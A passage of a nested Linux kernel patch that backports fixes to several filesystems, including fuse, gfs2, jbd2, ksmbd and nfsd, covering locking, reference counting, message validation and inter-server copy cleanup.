+ 	bool isdir = S_ISDIR(inode->i_mode);
+ 
++	if (!fuse_allow_current_process(fm->fc))
++		return ERR_PTR(-EACCES);
++
++	if (fuse_is_bad(inode))
++		return ERR_PTR(-EIO);
++
+ 	if (!S_ISREG(inode->i_mode) && !isdir)
+ 		return ERR_PTR(-ENOTTY);
+ 
+diff --git a/fs/gfs2/aops.c b/fs/gfs2/aops.c
+index e782b4f1d1043..2f04c0ff7470b 100644
+--- a/fs/gfs2/aops.c
++++ b/fs/gfs2/aops.c
+@@ -127,7 +127,6 @@ static int __gfs2_jdata_writepage(struct page *page, struct writeback_control *w
+ {
+ 	struct inode *inode = page->mapping->host;
+ 	struct gfs2_inode *ip = GFS2_I(inode);
+-	struct gfs2_sbd *sdp = GFS2_SB(inode);
+ 
+ 	if (PageChecked(page)) {
+ 		ClearPageChecked(page);
+@@ -135,7 +134,7 @@ static int __gfs2_jdata_writepage(struct page *page, struct writeback_control *w
+ 			create_empty_buffers(page, inode->i_sb->s_blocksize,
+ 					     BIT(BH_Dirty)|BIT(BH_Uptodate));
+ 		}
+-		gfs2_page_add_databufs(ip, page, 0, sdp->sd_vfs->s_blocksize);
++		gfs2_page_add_databufs(ip, page, 0, PAGE_SIZE);
+ 	}
+ 	return gfs2_write_jdata_page(page, wbc);
+ }
+diff --git a/fs/gfs2/super.c b/fs/gfs2/super.c
+index 999cc146d7083..a07cf31f58ec3 100644
+--- a/fs/gfs2/super.c
++++ b/fs/gfs2/super.c
+@@ -138,8 +138,10 @@ int gfs2_make_fs_rw(struct gfs2_sbd *sdp)
+ 		return -EIO;
+ 
+ 	error = gfs2_find_jhead(sdp->sd_jdesc, &head, false);
+-	if (error || gfs2_withdrawn(sdp))
++	if (error) {
++		gfs2_consist(sdp);
+ 		return error;
++	}
+ 
+ 	if (!(head.lh_flags & GFS2_LOG_HEAD_UNMOUNT)) {
+ 		gfs2_consist(sdp);
+@@ -151,7 +153,9 @@ int gfs2_make_fs_rw(struct gfs2_sbd *sdp)
+ 	gfs2_log_pointers_init(sdp, head.lh_blkno);
+ 
+ 	error = gfs2_quota_init(sdp);
+-	if (!error && !gfs2_withdrawn(sdp))
++	if (!error && gfs2_withdrawn(sdp))
++		error = -EIO;
++	if (!error)
+ 		set_bit(SDF_JOURNAL_LIVE, &sdp->sd_flags);
+ 	return error;
+ }
+diff --git a/fs/hfs/bnode.c b/fs/hfs/bnode.c
+index 2015e42e752a6..6add6ebfef896 100644
+--- a/fs/hfs/bnode.c
++++ b/fs/hfs/bnode.c
+@@ -274,6 +274,7 @@ static struct hfs_bnode *__hfs_bnode_create(struct hfs_btree *tree, u32 cnid)
+ 		tree->node_hash[hash] = node;
+ 		tree->node_hash_cnt++;
+ 	} else {
++		hfs_bnode_get(node2);
+ 		spin_unlock(&tree->hash_lock);
+ 		kfree(node);
+ 		wait_event(node2->lock_wq, !test_bit(HFS_BNODE_NEW, &node2->flags));
+diff --git a/fs/hfsplus/super.c b/fs/hfsplus/super.c
+index 122ed89ebf9f2..1986b4f18a901 100644
+--- a/fs/hfsplus/super.c
++++ b/fs/hfsplus/super.c
+@@ -295,11 +295,11 @@ static void hfsplus_put_super(struct super_block *sb)
+ 		hfsplus_sync_fs(sb, 1);
+ 	}
+ 
++	iput(sbi->alloc_file);
++	iput(sbi->hidden_dir);
+ 	hfs_btree_close(sbi->attr_tree);
+ 	hfs_btree_close(sbi->cat_tree);
+ 	hfs_btree_close(sbi->ext_tree);
+-	iput(sbi->alloc_file);
+-	iput(sbi->hidden_dir);
+ 	kfree(sbi->s_vhdr_buf);
+ 	kfree(sbi->s_backup_vhdr_buf);
+ 	unload_nls(sbi->nls);
+diff --git a/fs/jbd2/transaction.c b/fs/jbd2/transaction.c
+index 6a404ac1c178f..15de1385012eb 100644
+--- a/fs/jbd2/transaction.c
++++ b/fs/jbd2/transaction.c
+@@ -1010,36 +1010,28 @@ repeat:
+ 	 * ie. locked but not dirty) or tune2fs (which may actually have
+ 	 * the buffer dirtied, ugh.)  */
+ 
+-	if (buffer_dirty(bh)) {
++	if (buffer_dirty(bh) && jh->b_transaction) {
++		warn_dirty_buffer(bh);
+ 		/*
+-		 * First question: is this buffer already part of the current
+-		 * transaction or the existing committing transaction?
+-		 */
+-		if (jh->b_transaction) {
+-			J_ASSERT_JH(jh,
+-				jh->b_transaction == transaction ||
+-				jh->b_transaction ==
+-					journal->j_committing_transaction);
+-			if (jh->b_next_transaction)
+-				J_ASSERT_JH(jh, jh->b_next_transaction ==
+-							transaction);
+-			warn_dirty_buffer(bh);
+-		}
+-		/*
+-		 * In any case we need to clean the dirty flag and we must
+-		 * do it under the buffer lock to be sure we don't race
+-		 * with running write-out.
++		 * We need to clean the dirty flag and we must do it under the
++		 * buffer lock to be sure we don't race with running write-out.
+ 		 */
+ 		JBUFFER_TRACE(jh, "Journalling dirty buffer");
+ 		clear_buffer_dirty(bh);
++		/*
++		 * The buffer is going to be added to BJ_Reserved list now and
++		 * nothing guarantees jbd2_journal_dirty_metadata() will be
++		 * ever called for it. So we need to set jbddirty bit here to
++		 * make sure the buffer is dirtied and written out when the
++		 * journaling machinery is done with it.
++		 */
+ 		set_buffer_jbddirty(bh);
+ 	}
+ 
+-	unlock_buffer(bh);
+-
+ 	error = -EROFS;
+ 	if (is_handle_aborted(handle)) {
+ 		spin_unlock(&jh->b_state_lock);
++		unlock_buffer(bh);
+ 		goto out;
+ 	}
+ 	error = 0;
+@@ -1049,8 +1041,10 @@ repeat:
+ 	 * b_next_transaction points to it
+ 	 */
+ 	if (jh->b_transaction == transaction ||
+-	    jh->b_next_transaction == transaction)
++	    jh->b_next_transaction == transaction) {
++		unlock_buffer(bh);
+ 		goto done;
++	}
+ 
+ 	/*
+ 	 * this is the first time this transaction is touching this buffer,
+@@ -1074,10 +1068,24 @@ repeat:
+ 		 */
+ 		smp_wmb();
+ 		spin_lock(&journal->j_list_lock);
++		if (test_clear_buffer_dirty(bh)) {
++			/*
++			 * Execute buffer dirty clearing and jh->b_transaction
++			 * assignment under journal->j_list_lock locked to
++			 * prevent bh being removed from checkpoint list if
++			 * the buffer is in an intermediate state (not dirty
++			 * and jh->b_transaction is NULL).
++			 */
++			JBUFFER_TRACE(jh, "Journalling dirty buffer");
++			set_buffer_jbddirty(bh);
++		}
+ 		__jbd2_journal_file_buffer(jh, transaction, BJ_Reserved);
+ 		spin_unlock(&journal->j_list_lock);
++		unlock_buffer(bh);
+ 		goto done;
+ 	}
++	unlock_buffer(bh);
++
+ 	/*
+ 	 * If there is already a copy-out version of this buffer, then we don't
+ 	 * need to make another one
+diff --git a/fs/ksmbd/smb2misc.c b/fs/ksmbd/smb2misc.c
+index 6e25ace365684..fbdde426dd01d 100644
+--- a/fs/ksmbd/smb2misc.c
++++ b/fs/ksmbd/smb2misc.c
+@@ -149,15 +149,11 @@ static int smb2_get_data_area_len(unsigned int *off, unsigned int *len,
+ 		break;
+ 	case SMB2_LOCK:
+ 	{
+-		int lock_count;
++		unsigned short lock_count;
+ 
+-		/*
+-		 * smb2_lock request size is 48 included single
+-		 * smb2_lock_element structure size.
+-		 */
+-		lock_count = le16_to_cpu(((struct smb2_lock_req *)hdr)->LockCount) - 1;
++		lock_count = le16_to_cpu(((struct smb2_lock_req *)hdr)->LockCount);
+ 		if (lock_count > 0) {
+-			*off = __SMB2_HEADER_STRUCTURE_SIZE + 48;
++			*off = offsetof(struct smb2_lock_req, locks);
+ 			*len = sizeof(struct smb2_lock_element) * lock_count;
+ 		}
+ 		break;
+@@ -412,20 +408,19 @@ int ksmbd_smb2_check_message(struct ksmbd_work *work)
+ 			goto validate_credit;
+ 
+ 		/*
+-		 * windows client also pad up to 8 bytes when compounding.
+-		 * If pad is longer than eight bytes, log the server behavior
+-		 * (once), since may indicate a problem but allow it and
+-		 * continue since the frame is parseable.
++		 * SMB2 NEGOTIATE request will be validated when message
++		 * handling proceeds.
+ 		 */
+-		if (clc_len < len) {
+-			ksmbd_debug(SMB,
+-				    "cli req padded more than expected. Length %d not %d for cmd:%d mid:%llu\n",
+-				    len, clc_len, command,
+-				    le64_to_cpu(hdr->MessageId));
++		if (command == SMB2_NEGOTIATE_HE)
++			goto validate_credit;
++
++		/*
++		 * Allow a message that padded to 8byte boundary.
++		 */
++		if (clc_len < len && (len - clc_len) < 8)
+ 			goto validate_credit;
+-		}
+ 
+-		ksmbd_debug(SMB,
++		pr_err_ratelimited(
+ 			    "cli req too short, len %d not %d. cmd:%d mid:%llu\n",
+ 			    len, clc_len, command,
+ 			    le64_to_cpu(hdr->MessageId));
+diff --git a/fs/ksmbd/smb2pdu.c b/fs/ksmbd/smb2pdu.c
+index d681f91947d92..875eecc6b95e7 100644
+--- a/fs/ksmbd/smb2pdu.c
++++ b/fs/ksmbd/smb2pdu.c
+@@ -6644,7 +6644,7 @@ int smb2_cancel(struct ksmbd_work *work)
+ 	struct ksmbd_conn *conn = work->conn;
+ 	struct smb2_hdr *hdr = smb2_get_msg(work->request_buf);
+ 	struct smb2_hdr *chdr;
+-	struct ksmbd_work *cancel_work = NULL, *iter;
++	struct ksmbd_work *iter;
+ 	struct list_head *command_list;
+ 
+ 	ksmbd_debug(SMB, "smb2 cancel called on mid %llu, async flags 0x%x\n",
+@@ -6666,7 +6666,9 @@ int smb2_cancel(struct ksmbd_work *work)
+ 				    "smb2 with AsyncId %llu cancelled command = 0x%x\n",
+ 				    le64_to_cpu(hdr->Id.AsyncId),
+ 				    le16_to_cpu(chdr->Command));
+-			cancel_work = iter;
++			iter->state = KSMBD_WORK_CANCELLED;
++			if (iter->cancel_fn)
++				iter->cancel_fn(iter->cancel_argv);
+ 			break;
+ 		}
+ 		spin_unlock(&conn->request_lock);
+@@ -6685,18 +6687,12 @@ int smb2_cancel(struct ksmbd_work *work)
+ 				    "smb2 with mid %llu cancelled command = 0x%x\n",
+ 				    le64_to_cpu(hdr->MessageId),
+ 				    le16_to_cpu(chdr->Command));
+-			cancel_work = iter;
++			iter->state = KSMBD_WORK_CANCELLED;
+ 			break;
+ 		}
+ 		spin_unlock(&conn->request_lock);
+ 	}
+ 
+-	if (cancel_work) {
+-		cancel_work->state = KSMBD_WORK_CANCELLED;
+-		if (cancel_work->cancel_fn)
+-			cancel_work->cancel_fn(cancel_work->cancel_argv);
+-	}
+-
+ 	/* For SMB2_CANCEL command itself send no response*/
+ 	work->send_no_response = 1;
+ 	return 0;
+@@ -7061,6 +7057,14 @@ skip:
+ 
+ 				ksmbd_vfs_posix_lock_wait(flock);
+ 
++				spin_lock(&work->conn->request_lock);
++				spin_lock(&fp->f_lock);
++				list_del(&work->fp_entry);
++				work->cancel_fn = NULL;
++				kfree(argv);
++				spin_unlock(&fp->f_lock);
++				spin_unlock(&work->conn->request_lock);
++
+ 				if (work->state != KSMBD_WORK_ACTIVE) {
+ 					list_del(&smb_lock->llist);
+ 					spin_lock(&work->conn->llist_lock);
+@@ -7069,9 +7073,6 @@ skip:
+ 					locks_free_lock(flock);
+ 
+ 					if (work->state == KSMBD_WORK_CANCELLED) {
+-						spin_lock(&fp->f_lock);
+-						list_del(&work->fp_entry);
+-						spin_unlock(&fp->f_lock);
+ 						rsp->hdr.Status =
+ 							STATUS_CANCELLED;
+ 						kfree(smb_lock);
+@@ -7093,9 +7094,6 @@ skip:
+ 				list_del(&smb_lock->clist);
+ 				spin_unlock(&work->conn->llist_lock);
+ 
+-				spin_lock(&fp->f_lock);
+-				list_del(&work->fp_entry);
+-				spin_unlock(&fp->f_lock);
+ 				goto retry;
+ 			} else if (!rc) {
+ 				spin_lock(&work->conn->llist_lock);
+diff --git a/fs/ksmbd/vfs_cache.c b/fs/ksmbd/vfs_cache.c
+index da9163b003503..0ae5dd0829e92 100644
+--- a/fs/ksmbd/vfs_cache.c
++++ b/fs/ksmbd/vfs_cache.c
+@@ -364,12 +364,11 @@ static void __put_fd_final(struct ksmbd_work *work, struct ksmbd_file *fp)
+ 
+ static void set_close_state_blocked_works(struct ksmbd_file *fp)
+ {
+-	struct ksmbd_work *cancel_work, *ctmp;
++	struct ksmbd_work *cancel_work;
+ 
+ 	spin_lock(&fp->f_lock);
+-	list_for_each_entry_safe(cancel_work, ctmp, &fp->blocked_works,
++	list_for_each_entry(cancel_work, &fp->blocked_works,
+ 				 fp_entry) {
+-		list_del(&cancel_work->fp_entry);
+ 		cancel_work->state = KSMBD_WORK_CLOSED;
+ 		cancel_work->cancel_fn(cancel_work->cancel_argv);
+ 	}
+diff --git a/fs/lockd/svc.c b/fs/lockd/svc.c
+index 59ef8a1f843f3..914ea1c3537d1 100644
+--- a/fs/lockd/svc.c
++++ b/fs/lockd/svc.c
+@@ -496,7 +496,7 @@ static struct ctl_table nlm_sysctls[] = {
+ 	{
+ 		.procname	= "nsm_use_hostnames",
+ 		.data		= &nsm_use_hostnames,
+-		.maxlen		= sizeof(int),
++		.maxlen		= sizeof(bool),
+ 		.mode		= 0644,
+ 		.proc_handler	= proc_dobool,
+ 	},
+diff --git a/fs/nfs/nfs4proc.c b/fs/nfs/nfs4proc.c
+index 40d749f29ed3f..4214286e01450 100644
+--- a/fs/nfs/nfs4proc.c
++++ b/fs/nfs/nfs4proc.c
+@@ -10604,7 +10604,9 @@ static void nfs4_disable_swap(struct inode *inode)
+ 	/* The state manager thread will now exit once it is
+ 	 * woken.
+ 	 */
+-	wake_up_var(&NFS_SERVER(inode)->nfs_client->cl_state);
++	struct nfs_client *clp = NFS_SERVER(inode)->nfs_client;
++
++	nfs4_schedule_state_manager(clp);
+ }
+ 
+ static const struct inode_operations nfs4_dir_inode_operations = {
+diff --git a/fs/nfs/nfs4trace.h b/fs/nfs/nfs4trace.h
+index 214bc56f92d2b..d27919d7241d3 100644
+--- a/fs/nfs/nfs4trace.h
++++ b/fs/nfs/nfs4trace.h
+@@ -292,32 +292,34 @@ TRACE_DEFINE_ENUM(NFS4CLNT_MOVED);
+ TRACE_DEFINE_ENUM(NFS4CLNT_LEASE_MOVED);
+ TRACE_DEFINE_ENUM(NFS4CLNT_DELEGATION_EXPIRED);
+ TRACE_DEFINE_ENUM(NFS4CLNT_RUN_MANAGER);
++TRACE_DEFINE_ENUM(NFS4CLNT_MANAGER_AVAILABLE);
+ TRACE_DEFINE_ENUM(NFS4CLNT_RECALL_RUNNING);
+ TRACE_DEFINE_ENUM(NFS4CLNT_RECALL_ANY_LAYOUT_READ);
+ TRACE_DEFINE_ENUM(NFS4CLNT_RECALL_ANY_LAYOUT_RW);
++TRACE_DEFINE_ENUM(NFS4CLNT_DELEGRETURN_DELAYED);
+ 
+ #define show_nfs4_clp_state(state) \
+ 	__print_flags(state, "|", \
+-		{ NFS4CLNT_MANAGER_RUNNING,	"MANAGER_RUNNING" }, \
+-		{ NFS4CLNT_CHECK_LEASE,		"CHECK_LEASE" }, \
+-		{ NFS4CLNT_LEASE_EXPIRED,	"LEASE_EXPIRED" }, \
+-		{ NFS4CLNT_RECLAIM_REBOOT,	"RECLAIM_REBOOT" }, \
+-		{ NFS4CLNT_RECLAIM_NOGRACE,	"RECLAIM_NOGRACE" }, \
+-		{ NFS4CLNT_DELEGRETURN,		"DELEGRETURN" }, \
+-		{ NFS4CLNT_SESSION_RESET,	"SESSION_RESET" }, \
+-		{ NFS4CLNT_LEASE_CONFIRM,	"LEASE_CONFIRM" }, \
+-		{ NFS4CLNT_SERVER_SCOPE_MISMATCH, \
+-						"SERVER_SCOPE_MISMATCH" }, \
+-		{ NFS4CLNT_PURGE_STATE,		"PURGE_STATE" }, \
+-		{ NFS4CLNT_BIND_CONN_TO_SESSION, \
+-						"BIND_CONN_TO_SESSION" }, \
+-		{ NFS4CLNT_MOVED,		"MOVED" }, \
+-		{ NFS4CLNT_LEASE_MOVED,		"LEASE_MOVED" }, \
+-		{ NFS4CLNT_DELEGATION_EXPIRED,	"DELEGATION_EXPIRED" }, \
+-		{ NFS4CLNT_RUN_MANAGER,		"RUN_MANAGER" }, \
+-		{ NFS4CLNT_RECALL_RUNNING,	"RECALL_RUNNING" }, \
+-		{ NFS4CLNT_RECALL_ANY_LAYOUT_READ, "RECALL_ANY_LAYOUT_READ" }, \
+-		{ NFS4CLNT_RECALL_ANY_LAYOUT_RW, "RECALL_ANY_LAYOUT_RW" })
++	{ BIT(NFS4CLNT_MANAGER_RUNNING),	"MANAGER_RUNNING" }, \
++	{ BIT(NFS4CLNT_CHECK_LEASE),		"CHECK_LEASE" }, \
++	{ BIT(NFS4CLNT_LEASE_EXPIRED),	"LEASE_EXPIRED" }, \
++	{ BIT(NFS4CLNT_RECLAIM_REBOOT),	"RECLAIM_REBOOT" }, \
++	{ BIT(NFS4CLNT_RECLAIM_NOGRACE),	"RECLAIM_NOGRACE" }, \
++	{ BIT(NFS4CLNT_DELEGRETURN),		"DELEGRETURN" }, \
++	{ BIT(NFS4CLNT_SESSION_RESET),	"SESSION_RESET" }, \
++	{ BIT(NFS4CLNT_LEASE_CONFIRM),	"LEASE_CONFIRM" }, \
++	{ BIT(NFS4CLNT_SERVER_SCOPE_MISMATCH),	"SERVER_SCOPE_MISMATCH" }, \
++	{ BIT(NFS4CLNT_PURGE_STATE),		"PURGE_STATE" }, \
++	{ BIT(NFS4CLNT_BIND_CONN_TO_SESSION),	"BIND_CONN_TO_SESSION" }, \
++	{ BIT(NFS4CLNT_MOVED),		"MOVED" }, \
++	{ BIT(NFS4CLNT_LEASE_MOVED),		"LEASE_MOVED" }, \
++	{ BIT(NFS4CLNT_DELEGATION_EXPIRED),	"DELEGATION_EXPIRED" }, \
++	{ BIT(NFS4CLNT_RUN_MANAGER),		"RUN_MANAGER" }, \
++	{ BIT(NFS4CLNT_MANAGER_AVAILABLE), "MANAGER_AVAILABLE" }, \
++	{ BIT(NFS4CLNT_RECALL_RUNNING),	"RECALL_RUNNING" }, \
++	{ BIT(NFS4CLNT_RECALL_ANY_LAYOUT_READ), "RECALL_ANY_LAYOUT_READ" }, \
++	{ BIT(NFS4CLNT_RECALL_ANY_LAYOUT_RW), "RECALL_ANY_LAYOUT_RW" }, \
++	{ BIT(NFS4CLNT_DELEGRETURN_DELAYED), "DELERETURN_DELAYED" })
+ 
+ TRACE_EVENT(nfs4_state_mgr,
+ 		TP_PROTO(
+diff --git a/fs/nfsd/filecache.c b/fs/nfsd/filecache.c
+index c0950edb26b0d..697acf5c3c681 100644
+--- a/fs/nfsd/filecache.c
++++ b/fs/nfsd/filecache.c
+@@ -331,37 +331,27 @@ nfsd_file_alloc(struct nfsd_file_lookup_key *key, unsigned int may)
+ 	return nf;
+ }
+ 
++/**
++ * nfsd_file_check_write_error - check for writeback errors on a file
++ * @nf: nfsd_file to check for writeback errors
++ *
++ * Check whether a nfsd_file has an unseen error. Reset the write
++ * verifier if so.
++ */
+ static void
+-nfsd_file_fsync(struct nfsd_file *nf)
+-{
+-	struct file *file = nf->nf_file;
+-	int ret;
+-
+-	if (!file || !(file->f_mode & FMODE_WRITE))
+-		return;
+-	ret = vfs_fsync(file, 1);
+-	trace_nfsd_file_fsync(nf, ret);
+-	if (ret)
+-		nfsd_reset_write_verifier(net_generic(nf->nf_net, nfsd_net_id));
+-}
+-
+-static int
+ nfsd_file_check_write_error(struct nfsd_file *nf)
+ {
+ 	struct file *file = nf->nf_file;
+ 
+-	if (!file || !(file->f_mode & FMODE_WRITE))
+-		return 0;
+-	return filemap_check_wb_err(file->f_mapping, READ_ONCE(file->f_wb_err));
++	if ((file->f_mode & FMODE_WRITE) &&
++	    filemap_check_wb_err(file->f_mapping, READ_ONCE(file->f_wb_err)))
++		nfsd_reset_write_verifier(net_generic(nf->nf_net, nfsd_net_id));
+ }
+ 
+ static void
+ nfsd_file_hash_remove(struct nfsd_file *nf)
+ {
+ 	trace_nfsd_file_unhash(nf);
+-
+-	if (nfsd_file_check_write_error(nf))
+-		nfsd_reset_write_verifier(net_generic(nf->nf_net, nfsd_net_id));
+ 	rhashtable_remove_fast(&nfsd_file_rhash_tbl, &nf->nf_rhash,
+ 			       nfsd_file_rhash_params);
+ }
+@@ -387,23 +377,12 @@ nfsd_file_free(struct nfsd_file *nf)
+ 	this_cpu_add(nfsd_file_total_age, age);
+ 
+ 	nfsd_file_unhash(nf);
+-
+-	/*
+-	 * We call fsync here in order to catch writeback errors. It's not
+-	 * strictly required by the protocol, but an nfsd_file could get
+-	 * evicted from the cache before a COMMIT comes in. If another
+-	 * task were to open that file in the interim and scrape the error,
+-	 * then the client may never see it. By calling fsync here, we ensure
+-	 * that writeback happens before the entry is freed, and that any
+-	 * errors reported result in the write verifier changing.
+-	 */
+-	nfsd_file_fsync(nf);
+-
+ 	if (nf->nf_mark)
+ 		nfsd_file_mark_put(nf->nf_mark);
+ 	if (nf->nf_file) {
+ 		get_file(nf->nf_file);
+ 		filp_close(nf->nf_file, NULL);
++		nfsd_file_check_write_error(nf);
+ 		fput(nf->nf_file);
+ 	}
+ 
+@@ -1159,6 +1138,7 @@ wait_for_construction:
+ out:
+ 	if (status == nfs_ok) {
+ 		this_cpu_inc(nfsd_file_acquisitions);
++		nfsd_file_check_write_error(nf);
+ 		*pnf = nf;
+ 	} else {
+ 		if (refcount_dec_and_test(&nf->nf_ref))
+diff --git a/fs/nfsd/nfs4layouts.c b/fs/nfsd/nfs4layouts.c
+index 3564d1c6f6104..e8a80052cb1ba 100644
+--- a/fs/nfsd/nfs4layouts.c
++++ b/fs/nfsd/nfs4layouts.c
+@@ -323,11 +323,11 @@ nfsd4_recall_file_layout(struct nfs4_layout_stateid *ls)
+ 	if (ls->ls_recalled)
+ 		goto out_unlock;
+ 
+-	ls->ls_recalled = true;
+-	atomic_inc(&ls->ls_stid.sc_file->fi_lo_recalls);
+ 	if (list_empty(&ls->ls_layouts))
+ 		goto out_unlock;
+ 
++	ls->ls_recalled = true;
++	atomic_inc(&ls->ls_stid.sc_file->fi_lo_recalls);
+ 	trace_nfsd_layout_recall(&ls->ls_stid.sc_stateid);
+ 
+ 	refcount_inc(&ls->ls_stid.sc_count);
+diff --git a/fs/nfsd/nfs4proc.c b/fs/nfsd/nfs4proc.c
+index f189ba7995f5a..e02ff76fad82c 100644
+--- a/fs/nfsd/nfs4proc.c
++++ b/fs/nfsd/nfs4proc.c
+@@ -1214,8 +1214,10 @@ out:
+ 	return status;
+ out_put_dst:
+ 	nfsd_file_put(*dst);
++	*dst = NULL;
+ out_put_src:
+ 	nfsd_file_put(*src);
++	*src = NULL;
+ 	goto out;
+ }
+ 
+@@ -1293,15 +1295,15 @@ extern void nfs_sb_deactive(struct super_block *sb);
+  * setup a work entry in the ssc delayed unmount list.
+  */
+ static __be32 nfsd4_ssc_setup_dul(struct nfsd_net *nn, char *ipaddr,
+-		struct nfsd4_ssc_umount_item **retwork, struct vfsmount **ss_mnt)
++				  struct nfsd4_ssc_umount_item **nsui)
+ {
+ 	struct nfsd4_ssc_umount_item *ni = NULL;
+ 	struct nfsd4_ssc_umount_item *work = NULL;
+ 	struct nfsd4_ssc_umount_item *tmp;
+ 	DEFINE_WAIT(wait);
++	__be32 status = 0;
+ 
+-	*ss_mnt = NULL;
+-	*retwork = NULL;
++	*nsui = NULL;
+ 	work = kzalloc(sizeof(*work), GFP_KERNEL);
+ try_again:
+ 	spin_lock(&nn->nfsd_ssc_lock);
+@@ -1325,12 +1327,12 @@ try_again:
+ 			finish_wait(&nn->nfsd_ssc_waitq, &wait);
+ 			goto try_again;
+ 		}
+-		*ss_mnt = ni->nsui_vfsmount;
++		*nsui = ni;
+ 		refcount_inc(&ni->nsui_refcnt);
+ 		spin_unlock(&nn->nfsd_ssc_lock);
+ 		kfree(work);
+ 
+-		/* return vfsmount in ss_mnt */
++		/* return vfsmount in (*nsui)->nsui_vfsmount */
+ 		return 0;
+ 	}
+ 	if (work) {
+@@ -1338,31 +1340,32 @@ try_again:
+ 		refcount_set(&work->nsui_refcnt, 2);
+ 		work->nsui_busy = true;
+ 		list_add_tail(&work->nsui_list, &nn->nfsd_ssc_mount_list);
+-		*retwork = work;
+-	}
++		*nsui = work;
++	} else
++		status = nfserr_resource;
+ 	spin_unlock(&nn->nfsd_ssc_lock);
+-	return 0;
++	return status;
+ }
+ 
+-static void nfsd4_ssc_update_dul_work(struct nfsd_net *nn,
+-		struct nfsd4_ssc_umount_item *work, struct vfsmount *ss_mnt)
++static void nfsd4_ssc_update_dul(struct nfsd_net *nn,
++				 struct nfsd4_ssc_umount_item *nsui,
++				 struct vfsmount *ss_mnt)
+ {
+-	/* set nsui_vfsmount, clear busy flag and wakeup waiters */
+ 	spin_lock(&nn->nfsd_ssc_lock);
+-	work->nsui_vfsmount = ss_mnt;
+-	work->nsui_busy = false;
++	nsui->nsui_vfsmount = ss_mnt;
++	nsui->nsui_busy = false;
+ 	wake_up_all(&nn->nfsd_ssc_waitq);
+ 	spin_unlock(&nn->nfsd_ssc_lock);
+ }
+ 
+-static void nfsd4_ssc_cancel_dul_work(struct nfsd_net *nn,
+-		struct nfsd4_ssc_umount_item *work)
++static void nfsd4_ssc_cancel_dul(struct nfsd_net *nn,
++				 struct nfsd4_ssc_umount_item *nsui)
+ {
+ 	spin_lock(&nn->nfsd_ssc_lock);
+-	list_del(&work->nsui_list);
++	list_del(&nsui->nsui_list);
+ 	wake_up_all(&nn->nfsd_ssc_waitq);
+ 	spin_unlock(&nn->nfsd_ssc_lock);
+-	kfree(work);
++	kfree(nsui);
+ }
+ 
+ /*
+@@ -1370,7 +1373,7 @@ static void nfsd4_ssc_cancel_dul_work(struct nfsd_net *nn,
+  */
+ static __be32
+ nfsd4_interssc_connect(struct nl4_server *nss, struct svc_rqst *rqstp,
+-		       struct vfsmount **mount)
++		       struct nfsd4_ssc_umount_item **nsui)
+ {
+ 	struct file_system_type *type;
+ 	struct vfsmount *ss_mnt;
+@@ -1381,7 +1384,6 @@ nfsd4_interssc_connect(struct nl4_server *nss, struct svc_rqst *rqstp,
+ 	char *ipaddr, *dev_name, *raw_data;
+ 	int len, raw_len;
+ 	__be32 status = nfserr_inval;
+-	struct nfsd4_ssc_umount_item *work = NULL;
+ 	struct nfsd_net *nn = net_generic(SVC_NET(rqstp), nfsd_net_id);
+ 
+ 	naddr = &nss->u.nl4_addr;
+@@ -1389,6 +1391,7 @@ nfsd4_interssc_connect(struct nl4_server *nss, struct svc_rqst *rqstp,
+ 					 naddr->addr_len,
+ 					 (struct sockaddr *)&tmp_addr,
+ 					 sizeof(tmp_addr));
++	*nsui = NULL;
+ 	if (tmp_addrlen == 0)
+ 		goto out_err;
+ 
+@@ -1431,10 +1434,10 @@ nfsd4_interssc_connect(struct nl4_server *nss, struct svc_rqst *rqstp,
+ 		goto out_free_rawdata;
+ 	snprintf(dev_name, len + 5, "%s%s%s:/", startsep, ipaddr, endsep);
+ 
+-	status = nfsd4_ssc_setup_dul(nn, ipaddr, &work, &ss_mnt);
++	status = nfsd4_ssc_setup_dul(nn, ipaddr, nsui);
+ 	if (status)
+ 		goto out_free_devname;
+-	if (ss_mnt)
++	if ((*nsui)->nsui_vfsmount)
+ 		goto out_done;
+ 
+ 	/* Use an 'internal' mount: SB_KERNMOUNT -> MNT_INTERNAL */
+@@ -1442,15 +1445,12 @@ nfsd4_interssc_connect(struct nl4_server *nss, struct svc_rqst *rqstp,
+ 	module_put(type->owner);
+ 	if (IS_ERR(ss_mnt)) {
+ 		status = nfserr_nodev;
+-		if (work)
+-			nfsd4_ssc_cancel_dul_work(nn, work);
++		nfsd4_ssc_cancel_dul(nn, *nsui);
+ 		goto out_free_devname;
+ 	}
+-	if (work)
+-		nfsd4_ssc_update_dul_work(nn, work, ss_mnt);
++	nfsd4_ssc_update_dul(nn, *nsui, ss_mnt);
+ out_done:
+ 	status = 0;
+-	*mount = ss_mnt;
+ 
+ out_free_devname:
+ 	kfree(dev_name);
+@@ -1474,7 +1474,7 @@ out_err:
+ static __be32
+ nfsd4_setup_inter_ssc(struct svc_rqst *rqstp,
+ 		      struct nfsd4_compound_state *cstate,
+-		      struct nfsd4_copy *copy, struct vfsmount **mount)
++		      struct nfsd4_copy *copy)
+ {
+ 	struct svc_fh *s_fh = NULL;
+ 	stateid_t *s_stid = &copy->cp_src_stateid;
+@@ -1487,7 +1487,7 @@ nfsd4_setup_inter_ssc(struct svc_rqst *rqstp,
+ 	if (status)
+ 		goto out;
+ 
+-	status = nfsd4_interssc_connect(copy->cp_src, rqstp, mount);
++	status = nfsd4_interssc_connect(copy->cp_src, rqstp, &copy->ss_nsui);
+ 	if (status)
+ 		goto out;
+ 
+@@ -1505,45 +1505,26 @@ out:
+ }
+ 
+ static void
+-nfsd4_cleanup_inter_ssc(struct vfsmount *ss_mnt, struct file *filp,
++nfsd4_cleanup_inter_ssc(struct nfsd4_ssc_umount_item *nsui, struct file *filp,
+ 			struct nfsd_file *dst)
+ {
+-	bool found = false;
+-	long timeout;
+-	struct nfsd4_ssc_umount_item *tmp;
+-	struct nfsd4_ssc_umount_item *ni = NULL;
+ 	struct nfsd_net *nn = net_generic(dst->nf_net, nfsd_net_id);
++	long timeout = msecs_to_jiffies(nfsd4_ssc_umount_timeout);
+ 
+ 	nfs42_ssc_close(filp);
+-	nfsd_file_put(dst);
+ 	fput(filp);
+ 
+-	if (!nn) {
+-		mntput(ss_mnt);
+-		return;
+-	}
+ 	spin_lock(&nn->nfsd_ssc_lock);
+-	timeout = msecs_to_jiffies(nfsd4_ssc_umount_timeout);
+-	list_for_each_entry_safe(ni, tmp, &nn->nfsd_ssc_mount_list, nsui_list) {
+-		if (ni->nsui_vfsmount->mnt_sb == ss_mnt->mnt_sb) {
+-			list_del(&ni->nsui_list);
+-			/*
+-			 * vfsmount can be shared by multiple exports,
+-			 * decrement refcnt. If the count drops to 1 it
+-			 * will be unmounted when nsui_expire expires.
+-			 */
